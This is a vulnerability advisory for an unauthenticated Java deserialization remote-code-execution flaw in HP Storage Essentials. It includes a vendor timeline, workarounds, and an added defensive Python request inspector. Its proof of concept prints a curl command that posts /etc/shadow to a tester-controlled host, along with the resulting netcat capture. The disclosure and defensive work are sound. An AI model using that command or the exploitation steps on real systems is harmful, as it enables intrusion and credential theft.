CVE-2017-10992 - HP Storage Essentials Remote Code Execution via Java deserialization

1. Vulnerability Properties

Title: HP Storage Essentials Remote Code Execution via Java deserialization
CVE ID: CVE-2017-10992
CVSSv3 Base Score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Vendor: HP (www.hp.com)
Products: HP Storage Essentials 9.5.0.142 (possibly others)
Advisory Release Date: 19 September 2017
Advisory URL: https://labs.integrity.pt/advisories/cve-2017-10992
Credits: Discovery by Filipe Bernardo <fb[at]integrity.pt>

2. Vulnerability Summary

HP Storage Essentials version 9.5.0.142 is vulnerable to unauthenticated Remote Code Execution via Java deserialization: an unauthenticated user sends a Java serialized request to the service endpoint at /invoker/JMXInvokerServlet.

3. Technical Details

HP Storage Essentials exposes a Java web server at http://[vulnerable_host]/servlet.html, presenting a login form that is used for product administration.

Exploiting the vulnerability

An unauthenticated attacker can send a Java serialized payload to the Java server endpoint at http://[vulnerable_host]/invoker/JMXInvokerServlet (which is a JBoss server) and achieve code execution. To demonstrate remote code execution as a proof of concept, we used the Burp extension “Java SerialKiller” to create a serialized request that runs the following command:

curl -X post -d @/etc/shadow http://<tester>:8888

The vulnerable server connected to the tester’s machine, which had a netcat session listening on port 8888, and sent the /etc/shadow file as the POST body, confirming the execution of an arbitrary command with root privileges:

connect to [x.x.x.x] from (UNKNOWN) [y.y.y.y] 33098
post / HTTP/1.1
User-Agent: curl/7.43.0
Accept: */*
Content-Length: 971
Content-Type: application/x-www-form-urlencoded

root:[redacted]:17358:0:99999:7:::bin::17110:0:99999:7:::daemon::17110:0:99999:7 […]

4. Vulnerable Versions

  • HP Storage Essentials version 9.5.0.142 (possibly others)

5. Solution

  • The HP team answered our emails saying that this version will not get updates, so no solution is available. See “6. Workarounds”.

6. Workarounds

  • Ensure all accesses to the management page are controlled by an access list.
  • Contact HP for support.
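The request shape described in section 3 (a Java serialized object posted to the invoker servlet) and the access-list workaround in section 6 can both be checked in front of the management interface. The following is an added illustration, not code from the advisory or from HP: it parses a raw HTTP request, flags the indicators of a serialized-object request to /invoker/, and applies a source-address allow list. The invoker path comes from the advisory; the allow-listed network, the client addresses, the sample requests and the content-type check are assumptions constructed for this example.

```python
"""Inspect HTTP requests to the management interface for Java
deserialization indicators and enforce a source allow list.

Added example for this advisory (not the advisory's or HP's code).
The sample requests and the allow list below are constructed.
"""
import ipaddress

# Java serialization stream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (0x0005)
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
# Endpoint named in the advisory; every path under /invoker/ is treated alike.
INVOKER_PREFIX = "/invoker/"
# Assumed management allow list (workaround in section 6): only these
# networks may reach the management interface at all.
MANAGEMENT_ALLOW_LIST = [ipaddress.ip_network("10.0.0.0/8")]


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: no header terminator")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii", "replace").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("ascii", "replace").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def source_allowed(client_ip: str) -> bool:
    """True when the client address falls inside the management allow list."""
    addr = ipaddress.ip_address(client_ip)
    return any(addr in net for net in MANAGEMENT_ALLOW_LIST)


def inspect_request(raw: bytes, client_ip: str) -> dict:
    """Return a verdict: the deserialization indicators found and the action to take."""
    method, path, headers, body = parse_http_request(raw)
    indicators = []
    if path.startswith(INVOKER_PREFIX):
        indicators.append("request targets the JBoss invoker servlet path")
    if body.startswith(JAVA_STREAM_MAGIC):
        indicators.append("body starts with Java serialization magic 0xACED0005")
    # Content type conventionally set by JBoss invoker clients (assumed indicator).
    if headers.get("content-type", "").startswith("application/x-java-serialized-object"):
        indicators.append("content type declares a serialized Java object")
    allowed = source_allowed(client_ip)
    verdict = {
        "method": method,
        "path": path,
        "client_ip": client_ip,
        "indicators": indicators,
        "source_allowed": allowed,
    }
    if not allowed:
        verdict["action"] = "block"   # access list: no management access from outside
    elif indicators:
        verdict["action"] = "alert"   # allow-listed source sending serialized objects: investigate
    else:
        verdict["action"] = "allow"
    return verdict


# Constructed sample mimicking the request shape from section 3. The body is
# only the stream header plus filler bytes, not a real serialized object.
SAMPLE_INVOKER_REQUEST = (
    b"POST /invoker/JMXInvokerServlet HTTP/1.1\r\n"
    b"Host: vulnerable-host.example\r\n"
    b"Content-Type: application/x-java-serialized-object\r\n"
    b"Content-Length: 16\r\n"
    b"\r\n"
    + JAVA_STREAM_MAGIC + b"\x73\x72" + b"\x00" * 10
)

# Constructed benign request for the administration login page.
SAMPLE_LOGIN_REQUEST = (
    b"GET /servlet.html HTTP/1.1\r\n"
    b"Host: vulnerable-host.example\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for req, ip in ((SAMPLE_INVOKER_REQUEST, "203.0.113.7"),
                    (SAMPLE_INVOKER_REQUEST, "10.1.2.3"),
                    (SAMPLE_LOGIN_REQUEST, "10.1.2.3")):
        print(inspect_request(req, ip))
```

The allow list is checked before the content indicators on purpose: since no fix is available, restricting who can reach the management interface is the control that actually closes the exposure, while the serialization indicators give the operator an alert when an allow-listed host starts sending serialized objects to the invoker path.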

7. Vulnerability Timeline

  • 18/May/2017 - Vendor contacted, reported vulnerability
  • 23/May/2017 - Vendor answered email, internal ticket PSRT110461
  • 29/May/2017 - Pinged vendor for details; answered that the information was provided to internal product engineering
  • 19/Jun/2017 - Pinged vendor for details; answered that the product team is still analyzing
  • 07/Jul/2017 - Vendor answered saying that this product is no longer supported; the product team will not be remediating this issue
  • 07/Jul/2017 - Mailed Mitre asking for CVE id, Mitre assigned id CVE-2017-10992
  • 19/Sep/2017 - Vulnerability Advisory published

8. References

  • https://softwaresupport.hpe.com/document/-/facetsearch/document/KM01178963